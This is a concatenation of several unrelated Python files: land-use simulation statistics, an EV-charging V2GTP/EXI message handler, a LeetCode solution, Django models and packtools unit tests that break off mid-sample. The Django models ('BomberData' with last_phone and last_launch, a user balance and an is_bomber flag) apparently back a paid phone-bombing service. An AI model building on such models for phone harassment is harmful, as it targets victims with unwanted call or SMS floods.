areRecL = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==0])
areRecI = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propRecL = areRecL / ls[8] if ls[8] > 0 else -9 # areCurL
propRecI = areRecI / ls[9] if ls[9] > 0 else -9 # areCurI
# store in a list: 9 + 9 # !! note the order !!
# abandoned
rl1 = [propAba, propAba1, propAba0, areAba, areAba1, areAba0] + ls[0:3]
# reclaimed
rl2 = [propRec, propRec1, propRec0, areRec, areRec1, areRec0] + ls[3:6]
# indigenous vs learned
rl3 = [propAbaL, propAbaI, areAbaL, areAbaI] + ls[6:8]
rl4 = [propRecL, propRecI, areRecL, areRecI] + ls[8: ]
# return to al
return rl1 + rl2 + rl3 + rl4
""" O-Function 3a: Store stats of ccfp plots (area) """
def stat_cc_plo(plList):
# plList = aglistPLs
# ccfp plots (area):
# areAPs, areAPs1, areAPs0, areCCs, areCCs1, areCCs0
# areAPsL, areAPsI, areCCsL, areCCsI
# get list of abandoned plots only
l_aba = [a for a in plList if a.code in [69]]
# stats: area of abandoned plots, by CCFP
areAPs = sum([a.area for a in l_aba])
areAPs1 = sum([a.area for a in l_aba if a.ifCcfp==1])
areAPs0 = sum([a.area for a in l_aba if a.ifCcfp==0])
# get list of ccfp plots only
l_ccf = [a for a in plList if a.code in [99]]
# stats: area of ccfp plots, by CCFP
areCCs = sum([a.area for a in l_ccf])
areCCs1 = sum([a.area for a in l_ccf if a.ifCcfp==1])
areCCs0 = sum([a.area for a in l_ccf if a.ifCcfp==0])
# derive indigenous and learned CCFP household land area
areAPsL = sum([a.area for a in l_aba if a.ifCcfp==1 and a.ifCcfpO==0])
areAPsI = sum([a.area for a in l_aba if a.ifCcfp==1 and a.ifCcfpO==1])
areCCsL = sum([a.area for a in l_ccf if a.ifCcfp==1 and a.ifCcfpO==0])
areCCsI = sum([a.area for a in l_ccf if a.ifCcfp==1 and a.ifCcfpO==1])
# add all to list
rl1 = [areAPs, areAPs1, areAPs0, areCCs, areCCs1, areCCs0]
rl2 = [ areAPsL, areAPsI, areCCsL, areCCsI]
# return to lStatCC
return rl1 + rl2
""" O-Function 3b: Write out stats for planting (area)"""
def stat_cc_pla(u1, u2, l, ls):
# u1=upd_pla, u2=upd_rev, l=aglistPLs, ls=lStatCCa
# ls=lStatCCa =
# [areAPs, areAPs1, areAPs0, areCCs, areCCs1, areCCs0
# areAPsL, areAPsI, areCCsL, areCCsI]
# ccfp plots (area):
# propPla, propPla1, propPla0, arePla, arePla1, arePla0,
# areAPs , areAPs1 , areAPs0
# propRev, propRev1, propRev0, areRev, areRev1, areRev0,
# areCCs , areCCs1 , areCCs0
# propPlaL, propPlaI, arePlaL, arePlaI, areAPsL, areAPsI
# propRevL, propRevI, areRevL, areRevI, areCCsL, areCCsI
# area of plots to be planted
arePla = sum([a.area for a in l if a.plid in u1])
arePla1 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==1])
arePla0 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==0])
# proportion
propPla = arePla / ls[0] if ls[0] > 0 else -9 # ls[0]: areAPs
propPla1 = arePla1 / ls[1] if ls[1] > 0 else -9 # ls[1]: areAPs1
propPla0 = arePla0 / ls[2] if ls[2] > 0 else -9 # ls[2]: areAPs0
# area of plots to be reverted
areRev = sum([a.area for a in l if a.plid in u2])
areRev1 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==1])
areRev0 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==0])
# percent
propRev = areRev / ls[3] if ls[3] > 0 else -9 # ls[3]: areCCs
propRev1 = areRev1 / ls[4] if ls[4] > 0 else -9 # ls[4]: areCCs1
propRev0 = areRev0 / ls[5] if ls[5] > 0 else -9 # ls[5]: areCCs0
# derive stats for indigenous vs learned
# area of being planted
l1 = [a for a in l if a.plid in u1]
arePlaL = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==0])
arePlaI = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propPlaL = arePlaL / ls[6] if ls[6] > 0 else -9 # areAPsL
propPlaI = arePlaI / ls[7] if ls[7] > 0 else -9 # areAPsI
# area of being reverted
l2 = [a for a in l if a.plid in u2]
areRevL = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==0])
areRevI = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propRevL = areRevL / ls[8] if ls[8] > 0 else -9 # areCCsL
propRevI = areRevI / ls[9] if ls[9] > 0 else -9 # areCCsI
# store in a list: 9 + 9 # !! note the order !!
# planted
rl1 = [propPla, propPla1, propPla0, arePla, arePla1, arePla0] + ls[0:3]
# reverted
rl2 = [propRev, propRev1, propRev0, areRev, areRev1, areRev0] + ls[3:6]
# indigenous vs learned
rl3 = [propPlaL, propPlaI, arePlaL, arePlaI] + ls[6:8]
rl4 = [propRevL, propRevI, areRevL, areRevI] + ls[8: ]
# return to al
return rl1 + rl2 + rl3 + rl4
""" O-Function 4a: Write out stats for collective action """
def stat_cc_col(u, l):
# u=opt_pla, l=aglistPLs
# opt_pla's one element is
# 0 [probPla, cRG]
# 2 propActPl, areActPl, areTotPl, percActGp, numActGp, numTotGp
# 8 plid2, hhid2, area2, ifCcfp2, ifCcfpO2]
# collective
# all participants
# rPlAb , arePl , areAb , m_probPla , m_cRG
# m_propActPl , m_areActPl , m_areTotPl
# m_percActGp , m_numActGp , m_numTotGp
# calculate planted area
u_ids = list(set([a[9] for a in u])) # hhid to plant
l_aba = [a for a in l if a.code==69] # abandoned plots
# get abandoned area for planted, and those (NOT planted) and (CCFP)
areAb1= sum([a.area for a in l_aba if a.hhid in u_ids])
areAb2= sum([a.area for a in l_aba if a.hhid not in u_ids and a.ifCcfp==1])
areAb = (areAb1 + areAb2)
# get planted area
arePl = sum([a[10] for a in u]) # a[10]:area2
rPlAb = arePl / areAb if areAb > 0 else -9
rl1a = [rPlAb, arePl, areAb]
# dervie mean of collective variables, excluding: plid2, area2, ...
rl1b = []
for i in range(8):
rl1b.append(sum([a[i] for a in u]) / len(u) if len(u) > 0 else -9)
# return to al
return rl1a + rl1b
""" O-Function 4b: Compare collective stats for learned and indigenous """
def stat_cc_com(u, l):
# u=opt_pla, l=aglistPLs
# opt_pla's one element is
# 0 [probPla, cRG]
# 2 propActPl, areActPl, areTotPl, percActGp, numActGp, numTotGp
# 8 plid2, hhid2, area2, ifCcfp2, ifCcfpO2]
# collective
# learned
# rPlAbL, arePlL, areAbL, m_probPlaL, m_cRGL
# m_propActPlL, m_areActPlL, m_areTotPlL
# m_percActGpL, m_numActGpL, m_numTotGpL
# indigenous
# rPlAbI, arePlI, areAbI, m_probPlaI, m_cRGI
# m_propActPlI, m_areActPlI, m_areTotPlI
# m_percActGpI, m_numActGpI, m_numTotGpI
# derive learned CCFP participants collective action
u_ids = list(set([a[9] for a in u])) # hhid to plant
l_aba = [a for a in l if a.code==69 and a.ifCcfpO==0] # abandoned, learned
# get abandoned area from two parts of learned CCFP households
areAb1= sum([a.area for a in l_aba if a.hhid in u_ids])
areAb2= sum([a.area for a in l_aba if a.hhid not in u_ids and a.ifCcfp==1])
areAb = areAb1 + areAb2
# calculate existing abandoned area
arePl = sum([a[10] for a in u if a[12]==0]) # a[9]:area2, a[12]:ifCcfpO2
# ratio of planted on abandoned areas
rPlAb = arePl / areAb if areAb > 0 else -9
# add to list
rl2a = [rPlAb, arePl, areAb]
# dervie mean of collective variables, excluding: plid2, area2, ...
u2 = [a for a in u if a[12]==0] # a[12]:ifCcfpO2
rl2b = []
for i in range(8):
rl2b.append(sum([a[i] for a in u2]) / len(u2) if len(u2) > 0 else -9)
# derive indigenous CCFP participants collective action
u_ids = list(set([a[9] for a in u])) #hhid to plant
l_aba = [a for a in l if a.code==69 and a.ifCcfpO==1] #abandoned,indigenous
# get abandoned area from two parts of learned CCFP households
areAb1= sum([a.area for a in l_aba if a.hhid in u_ids])
areAb2= sum([a.area for a in l_aba if a.hhid not in u_ids and a.ifCcfp==1])
areAb = areAb1 + areAb2
# calculate existing abandoned area
arePl = sum([a[10] for a in u if a[12]==1]) # a[9]:area2, a[12]:ifCcfpO2
# ratio of planted on abandoned areas
rPlAb = arePl / areAb if areAb > 0 else -9
# add to list
rl3a = [rPlAb, arePl, areAb]
# dervie mean of collective variables, excluding: plid2, area2, ...
u2 = [a for a in u if a[12]==1] # a[12]:ifCcfpO2
rl3b = []
for i in range(8):
rl3b.append(sum([a[i] for a in u2]) / len(u2) if len(u2) > 0 else -9)
# reminder
# 0 [probPla, cRG]
# 2 propActPl, areActPl, areTotPl, percActGp, numActGp, numTotGp
# 8 plid2, hhid2, area2, ifCcfp2, ifCcfpO2]
# return to
return rl2a + rl2b + rl3a +rl3b
""" O-Function 5: Derive and write status of each tick """
def tick_final(t, inList, plList, hhList):
# t=tick+1, inList=aglistINs, plList=aglistPLs, hhList=aglistHHs
# individuals
ind = len(inList)
pop = len([a for a in inList if a.ifOutMig==0])
cur = len([a for a in inList if a.ifOutMig==1])
ret = len([a for a in inList if a.ifOutMig==0 and a.ifRetMig ==1])
ever = len([a for a in inList if a.ifOutMig==0 and a.ifEverOut==1])
# plots
land = sum([a.area for a in plList])
cul = sum([a.area for a in plList if a.code in [60,61]])
aba = sum([a.area for a in plList if a.code in [69 ]])
ccf = sum([a.area for a in plList if a.code in [99 ]])
zcul = cul / land if land > 0 else -9
zaba = aba / land if land > 0 else -9
zccf = ccf / land if land > 0 else -9
# households
hhs = len(hhList)
hh1 = len([a for a in hhList if a.ifCcfp==1])
hh0 = len([a for a in hhList if a.ifCcfp==0])
zhh1 = hh1 / hhs if hhs > 0 else -9
zhh0 = hh0 / hhs if hhs > 0 else -9
hhL = len([a for a in hhList if a.ifCcfp==1 and a.ifCcfpO==0])
hhI = len([a for a in hhList if a.ifCcfp==1 and a.ifCcfpO==1])
zhhL = hhL / hh1 if hh1 > 0 else -9
zhhI = hhI / hh1 if hh1 > 0 else -9
# write to dataframe
rl1 = ['staFin!', t]
rl2 = [ind , pop, cur, ret , ever]
rl3 = [land, cul, aba, ccf , zcul, zaba, zccf]
rl4 = [hhs , hh1, hh0, zhh1, zhh0]
rl5 = [ hhL, hhI, zhhL, zhhI]
rl = rl1 + rl2 + rl3 + rl4 + rl5
# return to write dataframe of df_sta_fin
return rl
|
"""
.. module:: message_handling
:platform: Unix
:synopsis: A module that processes V2GTP messages.
.. Copyright 2022 EDF
.. moduleauthor:: Oscar RODRIGUEZ INFANTE, Tony ZHOU, Trang PHAM, Efflam OLLIVIER
.. License:: This source code is licensed under the MIT License.
"""
from xsdata.formats.dataclass.context import XmlContext
from xsdata.formats.dataclass.parsers import XmlParser
from xsdata.formats.dataclass.serializers import XmlSerializer
from xsdata.formats.dataclass.serializers.config import SerializerConfig
from shared.messages import V2GTPMessage
from shared.global_values import PROTOCOL_VERSION
from shared.log import logger
import lxml
from shared.global_values import SDP_PAYLOAD_TYPES, MAX_PAYLOAD_LENGTH, APP_PROTOCOL_EXIG, COMMON_MESSAGES_EXIG, \
DC_MESSAGES_EXIG, APP_PROTOCOL_XSD, COMMON_MESSAGES_XSD, DC_MESSAGES_XSD
import jpype
import os
import jpype.imports
from jpype.types import *
# The code below allows usage of Java classes by starting a JVM inside Python. This way, we can access variables
# initialized in the VM and use functions written in Java.
classpath = f'{str.join(":", ["../shared/lib/" + name for name in os.listdir("../shared/lib/")])}'
jpype.startJVM(jpype.getDefaultJVMPath(), '-ea', "-Djava.class.path=%s" % classpath)
from java.io import FileInputStream, InputStream, ByteArrayInputStream, ByteArrayOutputStream, StringWriter, FileWriter
from java.lang import String
from org.openexi.scomp import EXISchemaReader
from org.openexi.schema import EXISchema
from org.openexi.sax import Transmogrifier, EXIReader
from org.openexi.proc.grammars import GrammarCache
from org.openexi.proc.common import AlignmentType, GrammarOptions
from org.xml.sax import InputSource
from java.nio.charset import Charset
from javax.xml.transform.sax import SAXTransformerFactory
from javax.xml.transform.stream import StreamResult
from javax.xml.parsers import SAXParserFactory
class Singleton(type):
"""This is a singleton design pattern class.
"""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
def open_exi_schema(filepath: str) -> EXISchema:
"""Loads EXISchema. Relies on Java classes.
:param filepath: The path to the EXIG file.
:return: EXISchema -- the object containing the schema.
"""
schema_reader = EXISchemaReader()
schema = None
fis = None
try:
fis = FileInputStream(filepath)
schema = schema_reader.parse(fis)
finally:
if fis:
fis.close()
return schema
class MessageHandler(metaclass=Singleton):
"""This is the class that will process every single V2GTP message.
"""
transmogrifier = Transmogrifier()
transmogrifier.setAlignmentType(AlignmentType.bitPacked)
options = GrammarOptions.DEFAULT_OPTIONS
transmogrifier.setBlockSize(1000000)
transmogrifier.setValueMaxLength(-1)
transmogrifier.setValuePartitionCapacity(0)
sax_transformer_factory = JObject(SAXTransformerFactory.newInstance(), SAXTransformerFactory)
sax_parser_factory = SAXParserFactory.newInstance()
sax_parser_factory.setNamespaceAware(True)
transformer_handler = sax_transformer_factory.newTransformerHandler()
reader = EXIReader()
reader.setAlignmentType(AlignmentType.bitPacked)
reader.setBlockSize(1000000)
reader.setValueMaxLength(-1)
reader.setValuePartitionCapacity(0)
reader.setContentHandler(transformer_handler)
ap_schema = open_exi_schema(APP_PROTOCOL_EXIG)
ap_grammar_cache = GrammarCache(ap_schema, options)
common_schema = open_exi_schema(COMMON_MESSAGES_EXIG)
common_grammar_cache = GrammarCache(common_schema, options)
dc_schema = open_exi_schema(DC_MESSAGES_EXIG)
dc_grammar_cache = GrammarCache(dc_schema, options)
def __init__(self):
self.xml_SAP_validator = lxml.etree.XMLSchema(file=APP_PROTOCOL_XSD)
self.xml_Common_validator = lxml.etree.XMLSchema(file=COMMON_MESSAGES_XSD)
self.xml_DC_validator = lxml.etree.XMLSchema(file=DC_MESSAGES_XSD)
def is_valid(self, v2gtp_message: V2GTPMessage) -> bool:
if self.is_version_valid(v2gtp_message) and self.is_version_valid(v2gtp_message) and \
self.is_payload_type_correct(v2gtp_message) and self.is_payload_length_correct(v2gtp_message):
logger.info("Message is valid.")
return True
logger.warn("Message is not valid.")
return False
@staticmethod
def is_version_valid(v2gtp_message: V2GTPMessage) -> bool:
protocol_version = v2gtp_message.get_protocol_version()
if protocol_version != PROTOCOL_VERSION:
logger.error("Protocol version mismatch.")
return False
if v2gtp_message.get_inverse_protocol_version() != protocol_version ^ 0xff:
logger.error("Inverse protocol version mismatch.")
return False
return True
@staticmethod
def is_payload_type_correct(v2gtp_message: V2GTPMessage) -> bool:
payload_type = v2gtp_message.get_payload_type()
for key in SDP_PAYLOAD_TYPES.keys():
if payload_type == key:
return True
logger.error("Unrecognized payload type.")
return False
@staticmethod
def is_payload_length_correct(v2gtp_message: V2GTPMessage) -> bool:
payload_length = v2gtp_message.get_payload_length()
if 0 < payload_length < MAX_PAYLOAD_LENGTH:
return True
logger.error("Wrong payload size.")
return False
# @staticmethod
# def open_exi_schema(filepath: str) -> EXISchema:
# """Loads EXISchema. Relies on Java classes.
#
# :param filepath: The path to the EXIG file.
# :return: EXISchema -- the object containing the schema.
# """
# schema_reader = EXISchemaReader()
# schema = None
# fis = None
# try:
# fis = FileInputStream(filepath)
# schema = schema_reader.parse(fis)
# finally:
# if fis:
# fis.close()
# return schema
@staticmethod
def encode(xml_contents: str, type_msg: str) -> str:
"""Turns a human-readable string to an EXI-encoded string. Relies on Java classes.
:param xml_contents: The XML string to be encoded.
:param type_msg: The type of message used.
:return: str -- the encoded result.
"""
contents = String(xml_contents)
input = None
output = None
try:
t = MessageHandler.transmogrifier
input = ByteArrayInputStream(contents.getBytes(Charset.forName("ASCII")));
output = ByteArrayOutputStream();
if type_msg == "SAP":
t.setGrammarCache(MessageHandler.ap_grammar_cache);
elif type_msg == "Common":
t.setGrammarCache(MessageHandler.common_grammar_cache);
elif type_msg == "DC":
t.setGrammarCache(MessageHandler.dc_grammar_cache);
else:
raise Exception("Unknown message type")
t.setOutputStream(output);
t.encode(InputSource(input));
result = output.toByteArray()
finally:
if input:
input.close()
if output:
output.close()
return result
@staticmethod
def decode(exi_contents: bytes, type_msg: str) -> str:
"""Turns encoded EXI bytes to human-readable string. Relies on Java classes.
:param exi_contents: The EXI encoded contents.
:param type_msg: The type of message used.
:return: str -- the decoded string.
"""
input = None
output = None
stringWriter = StringWriter()
result = None
try:
input = ByteArrayInputStream(exi_contents)
r = MessageHandler.reader
tf_handler = MessageHandler.transformer_handler
if type_msg == "SAP":
r.setGrammarCache(MessageHandler.ap_grammar_cache);
elif type_msg == "Common":
r.setGrammarCache(MessageHandler.common_grammar_cache);
elif type_msg == "DC":
r.setGrammarCache(MessageHandler.dc_grammar_cache);
else:
raise Exception("Unknown message type")
tf_handler.setResult(StreamResult(stringWriter))
r.parse(InputSource(input))
result = stringWriter.getBuffer().toString()
finally:
if input:
input.close()
if output:
output.close()
return str(result)
def supported_app_to_exi(self, xml_contents) -> bytes:
logger.info("Supported App Protocol message to be encoded")
if self.is_xml_valid(xml_contents, 'SAP'):
logger.info("Message is valid against Schema XSD")
return self.encode(xml_contents, "SAP")
else:
raise Exception("XML is not valid against schema")
def v2g_common_msg_to_exi(self, xml_contents) -> bytes:
logger.info("Common message to be encoded")
if self.is_xml_valid(xml_contents, 'Common'):
logger.info("Message is valid against Schema XSD")
return self.encode(xml_contents, "Common")
else:
raise Exception("XML is not valid against schema")
def v2g_dc_msg_to_exi(self, xml_contents) -> bytes:
logger.info("DC message to be encoded")
if self.is_xml_valid(xml_contents, 'DC'):
logger.info("Message is valid against Schema XSD")
return self.encode(xml_contents, "DC")
else:
raise Exception("XML is not valid against schema")
def exi_to_supported_app(self, exi_contents) -> str:
logger.info("Supported App Protocol message to be decoded")
return self.decode(exi_contents, "SAP")
def exi_to_v2g_common_msg(self, exi_contents) -> str:
logger.info("Common message to be decoded")
return self.decode(exi_contents, "Common")
def exi_to_v2g_dc_msg(self, exi_contents) -> str:
logger.info("DC message to be decoded")
return self.decode(exi_contents, "DC")
@staticmethod
def unmarshall(xml):
"""Extracts data from XML string and turns it to an object understood by the machine.
:param xml: The XLM string to extract data from.
:return: object -- the resulting XML object.
"""
parser = XmlParser(context=XmlContext())
xml_object = parser.from_string(xml)
return xml_object
@staticmethod
def marshall(message) -> str:
"""Turns an XML object to a string.
:param message: The XML object to be processed.
:return: str -- the resulting XML string.
"""
config = SerializerConfig(pretty_print=True)
serializer = XmlSerializer(config=config)
xml_string = serializer.render(message)
return xml_string
def is_xml_valid(self, xml, msg_type):
"""This method allows to check if an XML message is valid using the corresponding XSD.
:param xml: Input XML file
:param msg_type: message type based on schema
:return: boolean statement - true: valid, false: invalid
"""
is_valid = False
xml_file = lxml.etree.XML(xml.encode("ascii"))
if msg_type == 'SAP':
validator = self.xml_SAP_validator
elif msg_type == 'Common':
validator = self.xml_Common_validator
elif msg_type == 'DC':
validator = self.xml_DC_validator
try:
validator.assertValid(xml_file)
is_valid = True
except lxml.etree.DocumentInvalid as e:
logger.warn(e)
logger.warn(xml)
finally:
return is_valid
|
# https://leetcode.com/problems/factorial-trailing-zeroes/
#
# algorithms
# Easy (37.09%)
# Total Accepted: 140,770
# Total Submissions: 379,570
class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
while n > 0:
n /= 5
res += n
return res
|
from django.contrib.auth.models import User
from django.db import models
class UserData(models.Model):
auth_user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
id = models.IntegerField(primary_key=True)
balance = models.FloatField(default=0.0, null=False)
language = models.CharField(max_length=16, null=True)
username = models.CharField(max_length=150, null=True)
is_bomber = models.BooleanField(null=True)
is_blocked = models.BooleanField(null=True)
class Meta:
verbose_name = "UserData"
verbose_name_plural = "UsersData"
class BomberData(models.Model):
id = models.IntegerField(primary_key=True)
username = models.CharField(max_length=150)
circles = models.CharField(max_length=255)
last_phone = models.CharField(max_length=128, null=True)
last_launch = models.DateTimeField(null=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
verbose_name = "BomberData"
verbose_name_plural = "BombersData" |
# coding: utf-8
from __future__ import unicode_literals
import unittest
import io
import os
from tempfile import NamedTemporaryFile
from lxml import etree
from packtools import domain
def setup_tmpfile(method):
def wrapper(self):
valid_tmpfile = NamedTemporaryFile()
valid_tmpfile.write(b'<a><b>bar</b></a>')
valid_tmpfile.seek(0)
self.valid_tmpfile = valid_tmpfile
method(self)
self.valid_tmpfile.close()
return wrapper
SAMPLES_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'samples')
class HTMLGeneratorTests(unittest.TestCase):
@setup_tmpfile
def test_initializes_with_filepath(self):
self.assertTrue(domain.HTMLGenerator.parse(self.valid_tmpfile.name, valid_only=False))
def test_initializes_with_etree(self):
fp = io.BytesIO(b'<a><b>bar</b></a>')
et = etree.parse(fp)
self.assertTrue(domain.HTMLGenerator.parse(et, valid_only=False))
def test_languages(self):
sample = u"""<article xml:lang="pt">
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEqual(domain.HTMLGenerator.parse(et, valid_only=False).languages, ['pt', 'en', 'es'])
def test_language(self):
sample = u"""<article xml:lang="pt">
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEqual(domain.HTMLGenerator.parse(et, valid_only=False).language, 'pt')
def test_language_missing_data(self):
""" This should not happen since the attribute is mandatory.
"""
sample = u"""<article>
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEquals(domain.HTMLGenerator.parse(
et, valid_only=False).language, None)
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_epub_ppub(self):
sample = u"""<article>
<front>
<journal-meta>
<journal-title-group>
<journal-title>Revista de Saude Publica</journal-title>
<abbrev-journal-title abbrev-type='publisher'>Rev. Saude Publica</abbrev-journal-title>
</journal-title-group>
</journal-meta>
<article-meta>
<pub-date pub-type="epub-ppub">
<day>17</day>
<month>03</month>
<year>2014</year>
</pub-date>
<volume>10</volume>
<issue>2</issue>
</article-meta>
</front>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEqual(domain.HTMLGenerator.parse(et, valid_only=False)._get_bibliographic_legend(),
u'Rev. Saude Publica vol.10 no.2 Mar 17, 2014')
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_with_season(self):
pass
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_epub_epub_ppub(self):
pass
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_ahead_of_print(self):
pass
def test_generation_unknown_language(self):
sample = u"""<article xml:lang="pt">
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
gen = domain.HTMLGenerator.parse(et, valid_only=False)
self.assertRaises(ValueError, lambda: gen.generate('ru'))
def test_no_abstract_title_if_there_is_a_title_for_abstract(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<title>Abstract</title>
<p>Abstract Content</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 1)
self.assertEqual(title_tags[0].text, "Abstract")
def test_abstract_title_if_no_title_for_abstract(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<p>Abstract Content</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 1)
self.assertEqual(title_tags[0].text, "Abstract")
def test_no_abstract_title_if_there_are_titles_for_abstracts(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<title>Abstract</title>
<p>Abstract Content</p>
</abstract>
<trans-abstract xml:lang="es">
<title>Resumen</title>
<p>Contenido del Resumen</p>
</trans-abstract>
</article-meta>
</front>
<sub-article article-type="translation" xml:lang="pt">
<front-stub>
<abstract>
<title>Resumo</title>
<p>Conteúdo do Resumo</p>
</abstract>
</front-stub>
</sub-article>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 3)
self.assertEqual(
{title_tag.text for title_tag in title_tags},
set(["Abstract", "Resumen", "Resumo"])
)
def test_abstract_title_if_no_titles_for_abstracts(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<p>Abstract Content</p>
</abstract>
<trans-abstract xml:lang="es">
<p>Contenido del Resumen</p>
</trans-abstract>
</article-meta>
</front>
<sub-article article-type="translation" xml:lang="pt">
<front-stub>
<abstract>
<p>Conteúdo do Resumo</p>
</abstract>
</front-stub>
</sub-article>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 1)
self.assertEqual(title_tags[0].text, "Abstracts")
def test_if_visual_abstract_image_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="en">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Visual Abstract</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Inglês</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<img style="max-width:100%" src="2175-8239-jbn-2018-0058-vf01.jpg">', html_string)
def test_if_visual_abstract_caption_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Resumo Visual</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Português</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('Caption em Português', html_string)
def test_if_visual_abstract_anchor_section_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Resumo Visual</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Português</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<div class="articleSection" data-anchor="Resumo Visual">', html_string)
def test_if_visual_abstract_section_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Resumo Visual</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Português</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('Resumo Visual', html_string)
def test_if_visual_abstract_image_from_another_language_is_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
<sub-article article-type="translation" id="s1" xml:lang="en">
<front-stub>
<abstract abstract-type="graphical">
<title>Visual Abstract EN</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Inglês</title>
